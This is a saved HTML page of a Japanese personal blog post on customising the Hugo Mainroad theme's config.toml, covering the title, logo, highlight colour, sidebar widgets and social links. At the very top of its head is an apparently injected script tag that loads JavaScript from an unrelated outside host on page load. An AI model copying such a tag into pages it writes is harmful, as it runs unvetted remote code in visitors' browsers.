<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
	<script src="//kitchen.juicer.cc/?color=F29g1LsUUno=" async></script>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>[Hugoブログ04]テーマのカスタマイズその１ - Potatofolio</title>
	<script>(function(d,e){d[e]=d[e].replace("no-js","js");})(document.documentElement,"className");</script>
	<meta name="description" content="">
		<meta property="og:title" content="[Hugoブログ04]テーマのカスタマイズその１" />
<meta property="og:description" content="" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://massasquash.github.io/potatofolio/posts/mytools/01_hugoblog/20210111_hugo_blog04/" /><meta property="og:image" content="https://massasquash.github.io/potatofolio/img/page_logo.jpg"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-01-11T10:15:30&#43;09:00" />
<meta property="article:modified_time" content="2021-01-11T10:15:30&#43;09:00" />


		<meta itemprop="name" content="[Hugoブログ04]テーマのカスタマイズその１">
<meta itemprop="description" content=""><meta itemprop="datePublished" content="2021-01-11T10:15:30&#43;09:00" />
<meta itemprop="dateModified" content="2021-01-11T10:15:30&#43;09:00" />
<meta itemprop="wordCount" content="3198"><meta itemprop="image" content="https://massasquash.github.io/potatofolio/img/page_logo.jpg"/>
<meta itemprop="keywords" content="Hugoブログ," />
		<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://massasquash.github.io/potatofolio/img/page_logo.jpg"/>

<meta name="twitter:title" content="[Hugoブログ04]テーマのカスタマイズその１"/>
<meta name="twitter:description" content=""/>

	<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
	<link rel="dns-prefetch" href="//fonts.googleapis.com">
	<link rel="dns-prefetch" href="//fonts.gstatic.com">
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,400i,700">

	<link rel="stylesheet" href="https://massasquash.github.io/potatofolio/css/style.css">
	

	<link rel="shortcut icon" href="https://massasquash.github.io/potatofolio/favicon.ico">
		
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'G-ZSG8MKNR7M', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>

</head>
<body class="body">
	<div class="container container--outer">
		<header class="header">
	<div class="container header__container">
		
	<div class="logo logo--mixed">
		<a class="logo__link" href="https://massasquash.github.io/potatofolio/" title="Potatofolio" rel="home">
			<div class="logo__item logo__imagebox">
					<img class="logo__img" src="https://massasquash.github.io/potatofolio/img/page_logo.jpg">
				</div><div class="logo__item logo__text">
					<div class="logo__title">Potatofolio</div>
					<div class="logo__tagline">Agrifeel-LABO - My Development Note</div>
				</div>
		</a>
	</div>
		
<nav class="menu">
	<button class="menu__btn" aria-haspopup="true" aria-expanded="false" tabindex="0">
		<span class="menu__btn-title" tabindex="-1">Menu</span>
	</button>
	<ul class="menu__list">
		<li class="menu__item">
			<a class="menu__link" href="https://massasquash.github.io/potatofolio/posts/">
				
				<span class="menu__text">Posts</span>
				
			</a>
		</li>
		<li class="menu__item">
			<a class="menu__link" href="https://massasquash.github.io/potatofolio/python/">
				
				<span class="menu__text">Python</span>
				
			</a>
		</li>
		<li class="menu__item">
			<a class="menu__link" href="https://massasquash.github.io/potatofolio/categories/gas/">
				
				<span class="menu__text">GAS</span>
				
			</a>
		</li>
		<li class="menu__item">
			<a class="menu__link" href="https://massasquash.github.io/potatofolio/categories/%E5%AD%A6%E7%BF%92%E3%83%8E%E3%83%BC%E3%83%88/">
				
				<span class="menu__text">Notes</span>
				
			</a>
		</li>
		<li class="menu__item">
			<a class="menu__link" href="https://massasquash.github.io/potatofolio/pages/auther/">
				
				<span class="menu__text">auther</span>
				
			</a>
		</li>
	</ul>
</nav>

	</div>
</header>
		<div class="wrapper flex">
			<div class="primary">
			
<main class="main" role="main">
	<article class="post">
		<header class="post__header">
			<h1 class="post__title">[Hugoブログ04]テーマのカスタマイズその１</h1>
			<p class="post__lead">最低限のカスタマイズでブログを整える</p>
			<div class="post__meta meta">
<div class="meta__item-datetime meta__item">
	<svg class="meta__icon icon icon-time" width="16" height="14" viewBox="0 0 30 28"><path d="M15 0C7 0 1 6 1 14s6 14 14 14 14-6 14-14S23 0 15 0zm0 25C9 25 4 20 4 14S9 3 15 3s11 5 11 11-5 11-11 11zm1-18h-2v8.4l6.8 4.4L22 18l-6-3.8V7z"/></svg><time class="meta__text" datetime="2021-01-11T10:15:30&#43;09:00">January 11, 2021</time></div><div class="meta__item-categories meta__item"><svg class="meta__icon icon icon-category" width="16" height="16" viewBox="0 0 16 16"><path d="m7 2l1 2h8v11h-16v-13z"/></svg><span class="meta__text"><a class="meta__link" href="https://massasquash.github.io/potatofolio/categories/works/" rel="category">Works</a>
	</span>
</div></div>
		</header>
<div class="post__toc toc">
	<div class="toc__title">Page content</div>
	<div class="toc__menu">
		<nav id="TableOfContents">
  <ul>
    <li><a href="#概要">概要</a></li>
  </ul>

  <ul>
    <li><a href="#ブログの基本情報の設定">ブログの基本情報の設定</a></li>
    <li><a href="#デザインカラーの設定">デザイン（カラー）の設定</a></li>
    <li><a href="#メインの表示設定">メインの表示設定</a></li>
    <li><a href="#ウィジェットの設定">ウィジェットの設定</a></li>
    <li><a href="#ソーシャル情報の設定">ソーシャル情報の設定</a></li>
  </ul>

  <ul>
    <li><a href="#memo">MEMO</a></li>
  </ul>
</nav>
	</div>
</div>
<div class="content post__content clearfix">
			<h1 id="はじめに">はじめに</h1>
<p>Hugoの構造を理解しながらカスタマイズを行っていきます。
僕の使っているテーマは「<a href="https://github.com/vimux/mainroad/">Mainroad</a>」なので、こちらでカスタマイズしていきます。</p>
<p>基本的には、</p>
<ul>
<li>記事や載せたいページは<code>/content</code>以下ディレクトリに追加</li>
<li>設定は<code>config.toml</code>をいじっていく</li>
<li>記事やページそれぞれにもフロントマターを記述することで細かい設定ができる</li>
</ul>
<p>というイメージです。</p>
<p>こちらのページで詳しく書かれていて、とてもわかりやすいです。
<a href="https://terashim.com/posts/create-hugo-blog-and-customize-mainroad-theme/">Hugo によるブログ作成と mainroad テーマのカスタマイズ - terashim.com</a></p>
<h2 id="概要">概要</h2>
<p>こちらから飛べるデモサイトのような作りにしていきたいです。
<a href="https://themes.gohugo.io/mainroad/">Mainroad | Hugo Themes</a></p>
<p><a href="https://github.com/vimux/mainroad/#Configuration">Mainroadの公式GitHubページ</a>の<code>REAME</code>に<code>config.toml</code>のサンプルが載っているので、そちらを活用していきます。</p>
<p>この設定を丸々コピペしてくるだけだと、僕の環境だとどうもエラーが発生して解消しませんでした。<br>
必要な部分だけ理解しながらコピペしてきて、追加したい機能が出てきたら後で追加する、というやり方が今後のためにも良いかなと思います。</p>
<p>また、Hugoを完全に理解したり、HTML, CSSやGolangを読み解く…というところまではここでは目標としていません。
今回は、必要に応じて表示させてみて試しながら、調べたことや<a href="https://gohugo.io/documentation/">Hugoのドキュメント</a>と照らし合わせてカスタマイズしていきます。</p>
<h1 id="実装">実装</h1>
<h2 id="ブログの基本情報の設定">ブログの基本情報の設定</h2>
<ul>
<li>タイトル</li>
<li>日本語設定</li>
<li>サブタイトル、ロゴ</li>
<li>フッターのクレジット表記</li>
</ul>
<p>基本情報を先に設定します。<code>config.toml</code>をいじっていきます。<br>
タイトルやテーマ、github公開用の設定などはすでに記述済みかと思うので、それ以外の部分を追記します。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-toml" data-lang="toml"><span style="color:#a6e22e">title</span> = <span style="color:#e6db74">&#34;Potatofolio&#34;</span> <span style="color:#75715e"># ページタイトル</span>
<span style="color:#a6e22e">languageCode</span> = <span style="color:#e6db74">&#34;ja&#34;</span> <span style="color:#75715e"># 言語指定</span>
<span style="color:#a6e22e">theme</span> = <span style="color:#e6db74">&#34;mainroad&#34;</span>

<span style="color:#75715e"># github公開用</span>
<span style="color:#a6e22e">baseurl</span> = <span style="color:#e6db74">&#34;https://massasquash.github.io/potatofolio/&#34;</span>
<span style="color:#a6e22e">publishDir</span> = <span style="color:#e6db74">&#34;docs&#34;</span>
<span style="color:#a6e22e">canonifyurls</span> = <span style="color:#66d9ef">true</span>

[<span style="color:#a6e22e">Params</span>]
  <span style="color:#a6e22e">description</span> = <span style="color:#e6db74">&#34;This Is My Development Note&#34;</span> <span style="color:#75715e"># サイトの詳細</span>
  <span style="color:#a6e22e">copyright</span> = <span style="color:#e6db74">&#34;Massa&#34;</span> <span style="color:#75715e"># フッターに表示されるコピーライトの名前</span>

[<span style="color:#a6e22e">Params</span>.<span style="color:#a6e22e">logo</span>]
  <span style="color:#a6e22e">subtitle</span> = <span style="color:#e6db74">&#34;Agrifeel-LABO - My Learning And Development Note&#34;</span> <span style="color:#75715e"># ロゴサブタイトル。最上部に表示</span>
  <span style="color:#a6e22e">image</span> = <span style="color:#e6db74">&#34;img/page_logo.jpg&#34;</span> <span style="color:#75715e"># ロゴイメージ。&#34;static&#34;からの相対パス。</span>
</code></pre></div><p><code>title</code>に指定したタイトルは、ページ最上部に表示されるのと、ブラウザで開いたときのタブに表示させるタイトルにもなります。</p>
<p>ページ最上部のタイトルの下に表示させるサブタイトル・ロゴは<code>[Params.logo]</code>のブロックに指定します。
イメージファイルをロゴに表示させたい場合は、<code>static/</code>ディレクトリ以下に突っ込むのが良さそうです。例えば僕の場合はタイトルロゴは<code>static/img/</code>直下、記事に関係するものは<code>static/img/posts/</code>ディレクトリを作って入れています（以下のような構造）</p>
<pre><code>static
|- img
| `- posts
|   |- &lt;画像&gt;.jpg
|   |- &lt;画像&gt;.jpg
|   `- &lt;画像&gt;.jpg
`- page_logo.jp
</code></pre><p>画像を<code>config.toml</code>で指定する際は<code>static/</code>ディレクトリからの相対表記で書きます。</p>
<p>[Params]ブロックの<code>description</code>と、[Params.logo]の<code>subtitle</code>の違いが少しわかりづらいですが、<br>
<code>description</code>の方は記述した文字列はWeb上には一見表示されません。HTMLを見るとメタ情報に入っているようです。検索結果にタイトルと一緒に表示される簡単な説明文に当たるのでしょうか。</p>
<p><a href="https://bazubu.com/how-to-optimize-meta-description-26891.html">meta description（メタディスクリプション）タグの役割と最適化方法</a></p>
<h2 id="デザインカラーの設定">デザイン（カラー）の設定</h2>
<ul>
<li>区切り線のカラーを設定</li>
</ul>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-config.toml" data-lang="config.toml"><span style="color:#75715e"># Style</span>
[<span style="color:#a6e22e">Params</span>.<span style="color:#a6e22e">style</span>.<span style="color:#a6e22e">vars</span>]
  <span style="color:#a6e22e">highlightColor</span> = <span style="color:#e6db74">&#34;#2d91e2&#34;</span> <span style="color:#75715e"># ハイライトカラー</span>
</code></pre></div><p>色によってガラッと全体の雰囲気が変わる気がします。
適当に「#2d91e2」をコピペしてGoogle検索にかけると色のシミュレーターが出てくるので、それを使って好きな色を探すととても便利です。</p>
<h2 id="メインの表示設定">メインの表示設定</h2>
<ul>
<li>メインセクションの設定</li>
</ul>
<p>ホームページ（トップのページ）に表示したい記事のディレクトリをここで指定します。
ここで指定したディレクトリが、ウィジェットの「最新記事一覧」にも反映されます（ウィジェットについては後述）。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-config.toml" data-lang="config.toml">  <span style="color:#a6e22e">mainSections</span> = [<span style="color:#e6db74">&#34;posts&#34;</span>]
</code></pre></div><p>この配列の中に記事の入ってる<code>content</code>ディレクトリ以下のディレクトリ名を指定します。<br>
今回は<code>content/posts/</code>の中に記事を作っていこうと思うので、<code>[&quot;posts&quot;]</code>と指定します。<br>
参考までに、以下が僕の作っているディレクトリです。</p>
<pre><code>content
|- posts
| |- hugo_blog01.md
| |- hugo_blog02.md
| `- hugo_blog03.m
|- about.md
|- auther.md
`- privacy.md
</code></pre><p>この場合、postsディレクトリに入っている記事だけがホームページと最新記事一覧に表示されて、それ以外の記事はここには表示されません。
ただこれ、指定しなくても記事数が多いディレクトリが自動で認識されるようですね。
また、<code>[&quot;posts&quot;, &quot;news&quot;, &quot;novels&quot;]</code>のように複数のディレクトリを指定すると、指定したディレクトリ全てが反映されるようです。</p>
<p>現状あまり使い分けがわからないので、記事ディレクトリは分けずに１つだけにします。</p>
<h2 id="ウィジェットの設定">ウィジェットの設定</h2>
<ul>
<li>ウィジェットの表示設定</li>
<li>ウィジェットに載せる内容の詳細設定</li>
</ul>
<p>ウィジェットは、ブログのサイドバーに表示させるものです。
このサイドバーを左に表示するか右に表示するか、また「最新記事一覧」「カテゴリー一覧」など何を表示するのかを指定することができます。</p>
<pre><code>[Params.sidebar]
  home = &quot;right&quot;   # トップページのウィジェット設定
  list = &quot;right&quot;   # リストページのウィジェット設定
  single = &quot;right&quot; # シングルページのウィジェット設定
  widgets = [&quot;search&quot;, &quot;recent&quot;, &quot;categories&quot;, &quot;taglist&quot;, &quot;social&quot;]

[Params.widgets]
  recent_num = 5 # ウィジェットの&quot;Recent articles&quot;に表示する記事数
</code></pre><p>ウィジェットの設定項目は｀[Params.sidebar]｀ブロックに記述。
<code>home</code>はトップページ、<code>list</code>は記事一覧ページ、<code>single</code>は記事ページに当たるようです。それぞれ<code>right</code>, <code>left</code>, <code>false</code>どれかを指定できます（falseだとそのページにウィジェットを表示させない）</p>
<p>今回はウィジェットの位置をどのページからでも右側に固定したいため、全て<code>right</code>を指定しました。</p>
<p>ウィジェットに何を表示させるか、というのはここで指定します。
<code>widgets = [&quot;search&quot;, &quot;recent&quot;, &quot;categories&quot;, &quot;taglist&quot;, &quot;social&quot;]</code></p>
<ul>
<li>serch:      サーチバー</li>
<li>recent:     最新記事一覧</li>
<li>categories: 記事に指定したカテゴリ一覧</li>
<li>taglist:    記事に指定したタグ一覧</li>
<li>social:     SNSへのリンク</li>
</ul>
<h2 id="ソーシャル情報の設定">ソーシャル情報の設定</h2>
<p>上でウィジェットを指定した配列に<code>&quot;social&quot;</code>を入れていると、ウィジェットにSNSへのリンクボタンが表示されているはずです。
こちらのリンクをいじっていきます。</p>
<p><a href="https://github.com/vimux/mainroad/#Configuration">Mainroad公式</a>からコピーさせてもらったサンプルコードを使います。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-config.toml" data-lang="config.toml">[<span style="color:#a6e22e">Params</span>.<span style="color:#a6e22e">widgets</span>.<span style="color:#a6e22e">social</span>]
  <span style="color:#75715e"># Enable parts of social widget</span>
  <span style="color:#a6e22e">facebook</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">twitter</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">instagram</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">linkedin</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">telegram</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">github</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">gitlab</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">bitbucket</span> = <span style="color:#e6db74">&#34;username&#34;</span>
  <span style="color:#a6e22e">email</span> = <span style="color:#e6db74">&#34;example@example.com&#34;</span>
</code></pre></div><p>自分の使っているユーザーネームを指定するだけで、勝手にリンクを作ってくれます。便利ですね。<br>
使っていないSNSについては、行ごと消してしまいます。</p>
<p>また、これ以外のリンクも追加することもできます。</p>
<pre><code># Custom social links
[[Params.widgets.social.custom]]
  title = &quot;Youtube&quot;
  url = &quot;https://youtube.com/user/username&quot;
  icon = &quot;youtube.svg&quot; # Optional. Path relative to &quot;layouts/partials&quot;

[[Params.widgets.social.custom]]
  title = &quot;My Home Page&quot;
  url = &quot;http://example.com&quot;
</code></pre><p><code>[[Params.widgets.social.custom]]</code>ブロックを増やして行くとリンクも増えていく感じでしょうか。
この<code>icon</code>に画像を指定できますが、ここでもやはり<code>static/</code>ディレクトリからの相対パスで指定します。なので<code>static/</code>ディレクトリに追加したいSNSリンクの画像を入れてやります（なくても問題ありません）。</p>
<p>どこかで見た気がするのですが、仮に<code>static/</code>ディレクトリに指定のパスが見つからない場合は、<code>themes/mainroad/static/</code>とテーマの中にある<code>static/</code>ディレクトリの中を探しに行ってくれている様子です。</p>
<p>[TODO]ソース</p>
<h1 id="おわりに">おわりに</h1>
<p>次はメニューバーから飛べる固定ページを作ったり、記事に関する詳細な設定を追加していきます。</p>
<hr>
<h2 id="memo">MEMO</h2>
<ul>
<li>
<p>Hugo公式</p>
<ul>
<li><a href="https://gohugo.io/documentation/">Hugo Documentation | Hugo</a></li>
</ul>
</li>
<li>
<p>Mainroadテーマに関して</p>
<ul>
<li><a href="https://themes.gohugo.io/mainroad/">Mainroad | Hugo Themes</a></li>
<li><a href="https://github.com/vimux/mainroad/">GitHub - Vimux/Mainroad: Responsive, simple, clean and content-focused Hugo theme based on the MH Magazine lite WordPress theme</a></li>
</ul>
</li>
</ul>
<hr>

		</div>
		<footer class="post__footer">
			
<div class="post__tags tags clearfix">
	<svg class="tags__badge icon icon-tag" width="16" height="16" viewBox="0 0 32 32"><path d="M32 19c0 1-1 2-1 2L21 31s-1 1-2 1-2-1-2-1L2 16c-1-1-1.4-2-1.4-2S0 12.5 0 11V3C0 1.5.8.8.8.8S1.5 0 3 0h8c1.5 0 3 .6 3 .6S15 1 16 2l15 15s1 1 1 2zM7 10a3 3 0 1 0 0-6 3 3 0 0 0 0 6z"/></svg>
	<ul class="tags__list">
		<li class="tags__item">
			<a class="tags__link btn" href="https://massasquash.github.io/potatofolio/tags/hugo%E3%83%96%E3%83%AD%E3%82%B0/" rel="tag">Hugoブログ</a>
		</li>
	</ul>
</div>
		</footer>
	</article>
</main>


<nav class="pager flex">
	<div class="pager__item pager__item--prev">
		<a class="pager__link" href="https://massasquash.github.io/potatofolio/posts/mytools/01_hugoblog/20210111_hugo_blog03/" rel="prev">
			<span class="pager__subtitle">«&thinsp;Previous</span>
			<p class="pager__title">[Hugoブログ03]記事更新する際の手順</p>
		</a>
	</div>
	<div class="pager__item pager__item--next">
		<a class="pager__link" href="https://massasquash.github.io/potatofolio/posts/mytools/01_hugoblog/20210115_hugo_blog05/" rel="next">
			<span class="pager__subtitle">Next&thinsp;»</span>
			<p class="pager__title">[Hugoブログ05]テーマのカスタマイズその２</p>
		</a>
	</div>
</nav>


			</div>
			<aside class="sidebar"><div class="widget-search widget">
	<form class="widget-search__form" role="search" method="get" action="https://duckduckgo.com/">
		<label>
			<input class="widget-search__field" type="search" placeholder="SEARCH…" value="" name="q" aria-label="SEARCH…">
		</label>
		<input class="widget-search__submit" type="submit" value="Search">
		<input type="hidden" name="sites" value="https://massasquash.github.io/potatofolio/"/>
	</form>
</div>
<div class="widget-recent widget">
	<h4 class="widget__title">Recent Posts</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="https://massasquash.github.io/potatofolio/posts/mytools/02_my_file_organizer/09/">[ファイル整理ツール09]PDFファイルのみ他フォルダに分類する2[Python]</a></li>
			<li class="widget__item"><a class="widget__link" href="https://massasquash.github.io/potatofolio/posts/mytools/02_my_file_organizer/08/">[ファイル整理ツール08]PDFファイルのみ他フォルダに分類する1[Python]</a></li>
			<li class="widget__item"><a class="widget__link" href="https://massasquash.github.io/potatofolio/posts/mytools/02_my_file_organizer/07/">[ファイル整理ツール07]他のツールからスクリプトを実行できるようにする[Python]</a></li>
			<li class="widget__item"><a class="widget__link" href="https://massasquash.github.io/potatofolio/posts/mytools/02_my_file_organizer/06/">[ファイル整理ツール06]別フォルダにファイルを移動する[Python]</a></li>
			<li class="widget__item"><a class="widget__link" href="https://massasquash.github.io/potatofolio/posts/crafts/20210605_netatmo/01/">[NETATMO]屋内モジュール設置</a></li>
		</ul>
	</div>
</div>
<div class="widget-categories widget">
	<h4 class="widget__title">Categories</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/crafts/">crafts</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/gas/">GAS</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/mytools/">MyTools</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/python/">Python</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/pythoneffective-python-2th/">Python「Effective Python 2th」</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/works/">Works</a>
			</li>
			<li class="widget__item">
				<a class="widget__link" href="https://massasquash.github.io/potatofolio/categories/%E5%AD%A6%E7%BF%92%E3%83%8E%E3%83%BC%E3%83%88/">学習ノート</a>
			</li>
		</ul>
	</div>
</div>
<div class="widget-taglist widget">
	<h4 class="widget__title">Tags</h4>
	<div class="widget__content">
		<a class="widget-taglist__link widget__link btn" href="https://massasquash.github.io/potatofolio/tags/diy/" title="DIY">DIY</a>
		<a class="widget-taglist__link widget__link btn" href="https://massasquash.github.io/potatofolio/tags/hugo%E3%83%96%E3%83%AD%E3%82%B0/" title="Hugoブログ">Hugoブログ</a>
		<a class="widget-taglist__link widget__link btn" href="https://massasquash.github.io/potatofolio/tags/%E3%83%84%E3%83%BC%E3%83%AB%E5%88%B6%E4%BD%9C/" title="ツール制作">ツール制作</a>
		<a class="widget-taglist__link widget__link btn" href="https://massasquash.github.io/potatofolio/tags/%E6%A5%AD%E5%8B%99%E5%8A%B9%E7%8E%87%E5%8C%96/" title="業務効率化">業務効率化</a>
	</div>
</div>
<div class="widget-social widget">
	<h4 class="widget-social__title widget__title">Social</h4>
	<div class="widget-social__content widget__content">
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Twitter" rel="noopener noreferrer" href="https://twitter.com/massasquash" target="_blank">
				<svg class="widget-social__link-icon icon icon-twitter" width="24" height="24" viewBox="0 0 384 312"><path d="m384 36.9c-14.1 6.3-29.3 10.5-45.2 12.4 16.3-9.7 28.8-25.2 34.6-43.6-15.2 9-32.1 15.6-50 19.1-14.4-15.2-34.9-24.8-57.5-24.8-43.5 0-78.8 35.3-78.8 78.8 0 6.2.7 12.2 2 17.9-65.5-3.3-123.5-34.6-162.4-82.3-6.7 11.6-10.6 25.2-10.6 39.6 0 27.3 13.9 51.4 35 65.6-12.9-.4-25.1-4-35.7-9.9v1c0 38.2 27.2 70 63.2 77.2-6.6 1.8-13.6 2.8-20.8 2.8-5.1 0-10-.5-14.8-1.4 10 31.3 39.1 54.1 73.6 54.7-27 21.1-60.9 33.7-97.8 33.7-6.4 0-12.6-.4-18.8-1.1 34.9 22.4 76.3 35.4 120.8 35.4 144.9 0 224.1-120 224.1-224.1 0-3.4-.1-6.8-.2-10.2 15.4-11.1 28.7-25 39.3-40.8z"/></svg>
				<span>Twitter</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="GitHub" rel="noopener noreferrer" href="https://github.com/Massasquash" target="_blank">
				<svg class="widget-social__link-icon icon icon-github" width="24" height="24" viewBox="0 0 384 374"><path d="m192 0c-106.1 0-192 85.8-192 191.7 0 84.7 55 156.6 131.3 181.9 9.6 1.8 13.1-4.2 13.1-9.2 0-4.6-.2-16.6-.3-32.6-53.4 11.6-64.7-25.7-64.7-25.7-8.7-22.1-21.3-28-21.3-28-17.4-11.9 1.3-11.6 1.3-11.6 19.3 1.4 29.4 19.8 29.4 19.8 17.1 29.3 44.9 20.8 55.9 15.9 1.7-12.4 6.7-20.8 12.2-25.6-42.6-4.8-87.5-21.3-87.5-94.8 0-20.9 7.5-38 19.8-51.4-2-4.9-8.6-24.3 1.9-50.7 0 0 16.1-5.2 52.8 19.7 15.3-4.2 31.7-6.4 48.1-6.5 16.3.1 32.7 2.2 48.1 6.5 36.7-24.8 52.8-19.7 52.8-19.7 10.5 26.4 3.9 45.9 1.9 50.7 12.3 13.4 19.7 30.5 19.7 51.4 0 73.7-44.9 89.9-87.7 94.6 6.9 5.9 13 17.6 13 35.5 0 25.6-.2 46.3-.2 52.6 0 5.1 3.5 11.1 13.2 9.2 76.2-25.5 131.2-97.3 131.2-182 0-105.9-86-191.7-192-191.7z"/></svg>
				<span>GitHub</span>
			</a>
		</div>

		
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Note" rel="noopener noreferrer" href="https://note.com/agrifeel_labo" target="_blank">
				<span>Note</span>
			</a>
		</div>
		
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Youtube" rel="noopener noreferrer" href="https://www.youtube.com/channel/UCsu1mENsBiVFsdc-yq0a4Aw" target="_blank">
				<span>Youtube</span>
			</a>
		</div>
		
	</div>
</div>
</aside>
		</div>
		<footer class="footer">
	<div class="container footer__container flex">
		
<div class="footer__links">
	<a class="footer__link" href="https://massasquash.github.io/potatofolio/pages/privacy/">プライバシーポリシー</a>
</div>
		<div class="footer__copyright">
			&copy; 2021 Massa.
			<span class="footer__copyright-credits">Generated with <a href="https://gohugo.io/" rel="nofollow noopener" target="_blank">Hugo</a> and <a href="https://github.com/Vimux/Mainroad/" rel="nofollow noopener" target="_blank">Mainroad</a> theme.</span>
		</div>
	</div>
</footer>
	</div>
<script async defer src="https://massasquash.github.io/potatofolio/js/menu.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML" async></script>
</body>
</html>